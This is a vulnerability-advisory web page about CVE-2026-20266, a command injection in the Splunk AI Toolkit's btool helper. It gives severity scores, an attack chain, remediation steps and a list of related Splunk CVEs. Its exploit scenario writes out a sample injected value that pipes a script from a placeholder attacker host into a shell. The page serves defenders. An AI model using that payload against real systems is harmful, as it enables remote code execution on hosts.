Skip to main content

Splunk AI Toolkit CVE-2026-20266

CRITICAL
OS Command Injection (CWE-78)
2026-06-17 cisco
9.1
CVSS 3.1 · Vendor: cisco
Share

Severity by source

Vendor (cisco) PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.1 CRITICAL

Network-reachable Splunk management plane (AV:N), no special conditions beyond admin role (AC:L, PR:H), no user interaction, and shell escape from splunkd to OS justifies S:C with full CIA impact.

3.1 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (cisco).

CVSS VectorVendor: cisco

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

1
Analysis Generated
Jun 17, 2026 - 18:03 vuln.today

DescriptionCVE.org

In Splunk AI Toolkit versions below 5.7.4, a user who holds the "admin" Splunk role could execute arbitrary OS commands on the host running the Splunk Enterprise instance.

The vulnerability is possible because of an unsafe shell execution pattern in the btool configuration helper, which constructs OS command strings from dynamic parameters without disabling shell interpretation.

AnalysisAI

Authenticated command injection in Splunk AI Toolkit versions below 5.7.4 allows a user with the Splunk admin role to execute arbitrary OS commands on the underlying Splunk Enterprise host. The flaw lives in the btool configuration helper, which builds shell command strings from dynamic parameters with shell interpretation enabled. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain Splunk admin credentials
Delivery
Authenticate to Splunk web/REST
Exploit
Invoke AI Toolkit btool helper with metacharacter payload
Execution
Shell interprets injected command
Persist
Execute OS commands as splunkd user
Impact
Establish host foothold beyond Splunk RBAC

Vulnerability AssessmentAI

Exploitation Requires an authenticated session as a user holding the Splunk admin role on a Splunk Enterprise instance that has the Splunk AI Toolkit app (versions below 5.7.4) installed and reachable; the attacker must invoke the btool configuration helper code path and supply parameter values containing shell metacharacters. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score of 9.1 is driven mainly by AV:N, S:C, and full CIA impact, but PR:H means the attacker must already hold the Splunk admin role - a highly privileged identity that, in most realistic Splunk deployments, can already install apps, modify inputs.conf, and run scripted inputs. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has stolen or coerced Splunk admin credentials, or a malicious internal admin seeking host-level access, invokes the AI Toolkit's btool configuration helper with a parameter containing shell metacharacters such as `; curl http://attacker/x.sh | sh`. Because the helper concatenates the value into a shell command string, the injected payload executes as the splunkd OS user, giving the attacker an interactive foothold on the Splunk Enterprise host beyond Splunk's RBAC boundary. …
Remediation Vendor-released patch: upgrade the Splunk AI Toolkit app to version 5.7.4 or later, per Splunk advisory SVD-2026-0614 (https://advisory.splunk.com/advisories/SVD-2026-0614). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: identify all Splunk AI Toolkit installations and document which are running versions below 5.7.4; audit the complete membership of the Splunk admin role. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Splunk

View all
CVE-2026-20253 CRITICAL POC
9.8 Jun 10

Unauthenticated arbitrary file write in Splunk Enterprise (below 10.2.4 and 10.0.7) and Splunk Cloud Platform (below 10.

CVE-2026-20251 HIGH
8.8 Jun 10

Remote code execution in Splunk Enterprise, Splunk Cloud Platform, and the Splunk Secure Gateway app allows a low-privil

CVE-2026-7589 MEDIUM POC
5.5 May 01

Path traversal in the CSV Export endpoint of ghantakiran's splunk-mcp-integration allows remote unauthenticated attacker

CVE-2025-20229 HIGH
8.0 Mar 26

In Splunk Enterprise versions below 9.3.3, 9.2.5, and 9.1.8, and Splunk Cloud Platform versions below 9.3.2408.104, 9.2.

CVE-2025-20298 HIGH
8.0 Jun 02

Privilege escalation vulnerability in Splunk Universal Forwarder for Windows where incorrect file system permissions are

CVE-2025-20387 HIGH
8.0 Dec 03

In Splunk Universal Forwarder for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an u

CVE-2025-20386 HIGH
8.0 Dec 03

In Splunk Enterprise for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an upgrade to

CVE-2026-20252 HIGH
7.6 Jun 10

Server-side request forgery in Splunk Enterprise (below 10.2.4, 10.0.7, 9.4.12, 9.3.13) and Splunk Cloud Platform lets a

CVE-2025-20371 HIGH
7.5 Oct 01

In Splunk Enterprise versions below 10.0.1, 9.4.4, 9.3.6 and 9.2.8, and Splunk Cloud Platform versions below 9.3.2411.10

CVE-2026-20239 HIGH
7.5 May 20

Sensitive information disclosure in Splunk Enterprise (below 10.2.2 and 10.0.5) and Splunk Cloud Platform (multiple bran

CVE-2026-20163 HIGH
7.2 Mar 11

Arbitrary shell command execution in Splunk Enterprise and Cloud Platform allows authenticated users with the edit_cmd c

CVE-2025-20231 HIGH
7.1 Mar 26

In Splunk Enterprise versions below 9.4.1, 9.3.3, 9.2.5, and 9.1.8, and versions below 3.8.38 and 3.7.23 of the Splunk S

Share

CVE-2026-20266 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy